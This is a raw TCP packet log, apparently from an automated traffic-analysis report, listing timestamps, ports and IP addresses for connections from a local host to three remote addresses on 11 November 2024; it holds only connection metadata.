                                                                                                                                                                                                        Nov 11, 2024 08:10:53.870629072 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.871098042 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.871303082 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.871690035 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.871903896 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.913348913 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.913587093 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.913686037 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.913969040 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.914361000 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.914649010 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.914663076 CET49768443192.168.11.20172.67.200.96
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 11, 2024 08:10:53.914680004 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.914881945 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.978115082 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.978403091 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.978420019 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.978430033 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.978705883 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.979173899 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.979461908 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.979463100 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.979481936 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.979670048 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.979989052 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.980252981 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.980808973 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.981034040 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.981040001 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.981059074 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.981323957 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.981729984 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.982028008 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.982387066 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.982665062 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.984291077 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.984297991 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.984441042 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.984483957 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.984503031 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.984515905 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.984524012 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.984601021 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.984601021 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.984700918 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.985784054 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.985917091 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.986026049 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.986026049 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.986047029 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.986136913 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.986136913 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.986253023 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.988240004 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.988259077 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.988435030 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.988456964 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.988456964 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.988467932 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.988588095 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.988686085 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.990115881 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.990135908 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.990348101 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.990349054 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.990369081 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:53.990381956 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.990463972 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:53.990566969 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.019876957 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.019927025 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.020117044 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.020117998 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.020173073 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.020190001 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.020190001 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.020190001 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.020297050 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.020397902 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.084332943 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.084352016 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.084589958 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.084605932 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.084981918 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.088485003 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.088502884 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.088679075 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.088707924 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.088754892 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.088754892 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.088773966 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.088897943 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.088897943 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.088992119 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.089072943 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.091402054 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.091415882 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.091593981 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.091593981 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.091686964 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.091687918 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.091687918 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.091706038 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.091725111 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.091912985 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.093276024 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.093292952 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.093477011 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.093514919 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.093514919 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.093524933 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.093614101 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.093710899 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.095181942 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.095199108 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.095350981 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.095350981 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.095371008 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.095371008 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.095468998 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.095478058 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.095648050 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.097465992 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.097480059 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.097676992 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.097676992 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.097697020 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.097707033 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.097707033 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.097805023 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.097871065 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.244147062 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.244165897 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.244364977 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.244364977 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.244386911 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.244398117 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.244487047 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.244575024 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.244575024 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.246270895 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.246289015 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.246501923 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.246501923 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.246520042 CET  443          49768      172.67.200.96   192.168.11.20
Nov 11, 2024 08:10:54.246539116 CET  49768        443        192.168.11.20   172.67.200.96
Nov 11, 2024 08:10:54.246539116 CET  49768        443        192.168.11.20   172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.246539116 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.246696949 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248675108 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248701096 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248869896 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248888969 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248888969 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248888969 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248899937 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248980045 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.248996973 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.249073029 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.250478029 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.250495911 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.250793934 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.250811100 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.250999928 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.252883911 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.252902031 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253015995 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253115892 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253151894 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253292084 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253317118 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253317118 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253334045 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.253530025 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.715924025 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.931458950 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.931684017 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:54.934626102 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.187922955 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.239934921 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.453337908 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.457021952 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.714030981 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.714190006 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.936086893 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:55.938031912 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.172935963 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.176376104 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.176923037 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.177725077 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.224134922 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.300121069 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.393166065 CET532794977287.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.393505096 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.396389961 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.397500992 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.397717953 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.398329973 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.398680925 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.400650978 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.401492119 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.510293961 CET8049773178.237.33.50192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.510525942 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.510555983 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.617793083 CET532794977287.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.634989023 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.651527882 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.661525011 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.677129984 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.692899942 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.725507975 CET8049773178.237.33.50192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.725744963 CET4977380192.168.11.20178.237.33.50
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.783116102 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.873904943 CET532794977287.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.877598047 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.880522966 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.895361900 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.899179935 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.911859035 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:56.915477037 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.058037996 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.093425989 CET532794977287.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.114347935 CET532794977287.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.114619970 CET4977253279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.173532009 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.173758984 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.204236984 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.204531908 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.438410044 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.468705893 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.468761921 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.468805075 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.468849897 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.468996048 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.469060898 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.472500086 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495455027 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495511055 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495565891 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495609999 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495804071 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.495949030 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688267946 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688324928 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688369989 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688410997 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688457012 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688498974 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:57.688601971 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160260916 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160269976 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160280943 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160464048 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160540104 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.160949945 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.360958099 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.360971928 CET532794977187.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.361263037 CET4977153279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378232956 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378298998 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378309011 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378319025 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378381968 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378391981 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378401995 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378465891 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378501892 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.378699064 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383327961 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383342028 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383352041 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383361101 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383371115 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383380890 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383390903 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383400917 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383410931 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383419991 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383430004 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383440018 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383449078 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383459091 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383469105 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383479118 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383486032 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383507013 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383507967 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383517027 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383527040 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383719921 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383769035 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383776903 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383786917 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.383795023 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.384071112 CET4977053279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395505905 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395598888 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395612955 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395622969 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395632029 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395642042 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395651102 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395661116 CET532794977087.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:58.395669937 CET532794977087.120.114.20192.168.11.20
